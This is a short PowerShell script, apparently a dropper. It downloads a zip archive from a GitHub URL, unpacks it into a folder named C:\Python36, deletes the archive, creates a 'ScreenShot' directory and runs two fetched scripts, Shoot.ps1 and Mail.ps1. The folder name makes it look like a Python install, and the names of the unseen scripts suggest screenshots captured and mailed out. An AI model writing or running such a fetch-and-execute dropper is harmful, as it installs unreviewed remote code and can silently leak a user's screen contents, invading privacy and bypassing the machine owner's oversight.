mkdir -Path "c:\users\Age\Desktop\Python36\"
mkdir -Path "c:\users\Age\Documents\ScreenShot\"
mkdir -Path "c:\Python36\"
Invoke-WebRequest -Uri "https://github.com/branderage/script/raw/main/in.zip" -OutFile "c:\Users\Age\Desktop\uit.zip"
Expand-Archive "c:\users\Age\Desktop\uit.zip" -DestinationPath "c:\Python36\"
Copy-Item -Path "c:\Python36\alle\*.*" -Destination "c:\Python36\"
Remove-Item -Path "c:\Users\Age\Desktop\uit.zip"
Remove-Item -Path "c:\Users\Age\Desktop\Python36\"
powershell.exe "c:\Python36\Shoot.ps1"
powershell.exe "C:\Python36\Mail.ps1"